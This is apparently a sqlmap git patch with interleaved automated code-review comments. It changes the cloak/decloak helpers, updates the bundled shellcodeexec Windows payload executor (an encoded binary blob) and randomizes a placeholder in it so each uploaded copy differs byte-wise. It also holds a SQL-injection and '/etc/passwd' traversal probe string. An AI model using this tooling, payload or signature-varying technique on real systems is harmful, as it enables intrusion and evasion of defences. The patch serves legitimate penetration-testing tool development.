From 265a78b455e7e1d234d7332860e18688b8daa5c5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 31 Aug 2015 14:27:47 +0200 Subject: [PATCH] Fixes #1379 --- extra/cloak/cloak.py | 20 ++++++++++-------- .../windows/shellcodeexec.x32.exe_ | Bin 2972 -> 2758 bytes lib/core/settings.py | 3 +++ lib/takeover/metasploit.py | 12 +++++++++++ 4 files changed, 26 insertions(+), 9 deletions(-) diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index a94f6756f..9f220088a 100755 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -24,18 +24,20 @@ def hideAscii(data): return retVal -def cloak(inputFile): - f = open(inputFile, 'rb') - data = zlib.compress(f.read()) - f.close() +def cloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() - return hideAscii(data) + return hideAscii(zlib.compress(data)) -def decloak(inputFile): - f = open(inputFile, 'rb') +def decloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() try: - data = zlib.decompress(hideAscii(f.read())) - except: + data = zlib.decompress(hideAscii(data)) + except Exception: print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile sys.exit(1) finally: 
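Review bot: The new `data=` path in `decloak` is only half-wired: the `finally:` block that closes the hunk is unchanged and sits outside it, and if it still carries the old `f.close()` then `f` is never bound when a caller passes `data` directly, so the function would end in an UnboundLocalError instead of returning; the `with open(...)` already closes the file, so that `finally` body should be dropped entirely. The error path is also worth a second look now that `decloak` is imported into lib/takeover/metasploit.py by this same patch: a corrupt or tampered shellcodeexec file makes a library call do `print` plus `sys.exit(1)` rather than raise, which kills the whole sqlmap run and prints `'%s' % inputFile` as `None` whenever bytes were supplied instead of a path. I would raise in the helper, e.g. `except Exception as ex: raise ValueError("invalid cloaked content (%s)" % (inputFile or "<data>"))` hmm — keep the message and let the `__main__` section of cloak.py translate the exception into the existing print/exit so the command-line behaviour is unchanged. The `__main__` block is not in this hunk.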
diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ index 4d699f1237a7e9a93f6e1a8417afe2bf2a311ed7..c4204cce6a9c8a12e850cd70436a0ec5b650ab7b 100644 GIT binary patch literal 2758 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 Mc%R1nKvYM|*Jm_pTL1t6 literal 2972 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 S_O`b4;M)B2&HsArmJnxle8h_Y diff --git a/lib/core/settings.py b/lib/core/settings.py index 2989907ea..303c10cf4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -443,6 +443,9 @@ BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)" # Payload used for checking of existence of IDS/WAF (dummier the better) IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd" +# Data inside shellcodeexec to be filled with random string +SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" + # Vectors used for provoking specific WAF/IDS/IPS behavior(s) WAF_ATTACK_VECTORS = ( "", # NIL diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 8717b6c73..8befc81ca 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -8,10 +8,13 @@ See the file 'doc/COPYING' for copying permission import os import re import sys +import tempfile import time from subprocess import PIPE +from extra.cloak.cloak import cloak +from extra.cloak.cloak import decloak from lib.core.common import dataToStdout from lib.core.common import Backend from lib.core.common import getLocalIP @@ -34,6 +37,7 @@ from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.settings import IS_WIN from lib.core.settings import METASPLOIT_SESSION_TIMEOUT +from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER from lib.core.settings import UNICODE_ENCODING from lib.core.subprocessng import blockingReadFromFD from lib.core.subprocessng import blockingWriteToFD 
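Review bot: The comment above `SHELLCODEEXEC_RANDOM_STRING_MARKER` should state the contract the value has to satisfy, because lib/takeover/metasploit.py (later in this patch) replaces it in place with `randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER))` and silently skips the randomization when the marker is not found. The string therefore has to match, byte for byte, the placeholder compiled into extra/shellcodeexec/windows/shellcodeexec.x32.exe_, and its length is what keeps the PE layout intact after substitution. Suggested wording: `# Placeholder compiled into the bundled shellcodeexec executable(s); metasploit.py overwrites it in place with a random string of the same length, so keep the value and its length in sync with the binary`.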
@@ -640,6 +644,14 @@ class Metasploit: if Backend.isOs(OS.WINDOWS): self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") + content = decloak(self.shellcodeexecLocal) + if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: + content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER))) + _ = cloak(data=content) + handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") + os.close(handle) + with open(self.shellcodeexecLocal, "w+b") as f: + f.write(_) else: self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch())
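Review bot: The randomized copy written via `tempfile.mkstemp(suffix="%s.exe_" % "32")` is never removed, so every run that reaches this branch leaves an executable artifact behind in the system temp directory and re-points `self.shellcodeexecLocal` at it; unless a cleanup routine elsewhere in sqlmap collects such files (not visible here), the path should be recorded for deletion at exit. The descriptor handling is also roundabout: `os.close(handle)` followed by `open(self.shellcodeexecLocal, "w+b")` can be collapsed into `with os.fdopen(handle, "wb") as f: f.write(cloak(data=content))`, which writes through the descriptor mkstemp created (mode 0600, exclusive) and drops the throwaway `_` name. A one-line comment on why the marker is rewritten would help the next reader, e.g. `# replace the compiled-in placeholder with a same-length random string so each uploaded copy of shellcodeexec differs byte-wise`; the intent is only inferable from the constant's name and the commit subject. `randomStr` is used without appearing in this patch's import hunks, so it is presumably already imported further up the file. The enclosing method begins outside this hunk.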